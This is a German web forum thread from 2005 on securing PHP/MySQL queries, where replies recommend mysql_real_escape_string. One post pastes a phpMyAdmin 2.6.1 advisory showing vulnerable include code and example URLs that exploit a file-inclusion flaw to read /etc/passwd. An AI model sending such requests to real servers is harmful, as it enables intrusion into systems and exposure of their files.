 |
| | Themen-Optionen |
06.10.2005, 15:28
| Nach oben #1 |
| o_O Registriert seit: 18.08.2005 Ort: Essen
Beiträge: 159
|  MySql Abfrage/verbindung sicher machen
Hallo, ich hab ne ganz einfache Frage, mit welchen Funktionen kann ich meine Abfrage in MySql so sicher wie möglich machen? Also, das nich jedes Script Kiddie etwas anstellen könnte. Ich hoffe Ihr wisst was ich grundlegendes meine  .Gruss bob
__________________ Grüsse aus Essen, bob |
|     |
|
07.10.2005, 16:22
| Nach oben #3 |
| Neuer Benutzer Registriert seit: 18.08.2005
Beiträge: 2
|
Am besten gleich auf alle Daten, die du mit einer Datenbank verwendest (einfügen, abfragen, etc.), die Funktion auf der php.net Seite unter Punkt 3 verwenden: http://www.php.net/manual/en/functio...ape-string.php Dann ist auch die Einstellung des Servers nicht mehr wichtig. mfg RudiS
__________________ Kunst kommt von Können und nicht von wollen, denn sonst würde es ja Wunst heißen. |
|
| |
|
07.10.2005, 16:36
| Nach oben #4 |
| Jann Hendrik Bekaan Registriert seit: 02.12.2004 Ort: Wildeshausen
Beiträge: 2.212
|
danke für den link!
__________________ Umfragen:  bitte beachten: Vorschläge für künftige Umfragen Woher weißt du vom developers-guide?Wenn du dich in ein interessantes Thema eingearbeitet hast, dann lass andere daran teilhaben! Schreibe ein Tutorial und beschreibe, wie es geht, was nicht klappt, wo man aufpassen muss usw.Danke! |
|
| |
|
07.10.2005, 23:35
| Nach oben #5 |
| Benutzer Registriert seit: 07.05.2005 Ort: nähe Münster
Beiträge: 33
|
__________________ http://redRogi.de |
|
| |
|
12.10.2005, 13:15
| Nach oben #6 |
| o_O Registriert seit: 18.08.2005 Ort: Essen
Beiträge: 159
|
Schonmal rechtherzlichen dank! Also ich verwende jetzt (richtig, nicht wie vorher) mysql_real_escape_string. Das macht das ganze ja schon um einiges sicherer, so wie ich das gelesen hab. Gibt es denn noch wichtige Sachen bei Abfragen bzw. Eintragungen in die DB was zu beachten? Danke!
__________________ Grüsse aus Essen, bob |
|
| |
|
12.10.2005, 14:52
| Nach oben #8 |
| Goldman.de Registriert seit: 09.10.2005 Ort: Frankfurt am Main
Beiträge: 190
|
hohohoh .... da jips ganz lecker sachen Date: 24.2.2005 - --- 0.Description --- phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. - --- 1. Remote file inclusion --- 1.0 This bug exist in css/phpmyadmin.css.php. You can include files. Error exist in ( wobei das ja mehr in richtung a php geht aber ) Code: $tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------
And now you can get files.
For exemple:
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd %00&theme=passwd%00
http ://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=pas swd%00
etc.
.... jupp richtig gehört festhalten und anschnallen remote root aber zurück zum thema: ich bin der auffassung das man ein ausgewogenes verhältniss/umgebung schafft zwischen sicherheit aber auch ein bissel kompfort ( das soll nicht heissen globals on und dann feste nur noch mit extrakt & $$ ) nein aber ein gleichgewicht mfg |
|
| |
|
| Lesezeichen |
| Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1) | |
| Themen-Optionen | |
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| [Xampp 1.6.2] Mysql kann nicht geladen werden, oder doch?! | kampfgnom | Tools, Server, Betriebssysteme | 10 | 14.07.2007 13:58 |
| [Suche] MySQL Tool ähnlich MySQL Front | ex³ | Gesuche | 5 | 22.12.2006 18:52 |
| Connect to mySQL DB | la-finest | Datenbanken | 7 | 29.06.2006 16:11 |
| ssh tunnel zu einer mysql datenbank | beny_mcde | Datenbanken | 4 | 07.06.2006 16:05 |
| MySQL 5.1 kommt in die Beta-Phase | Ben | Nachrichten | 1 | 02.03.2006 14:31 |
Alle Zeitangaben in WEZ +2. Es ist jetzt 11:38 Uhr.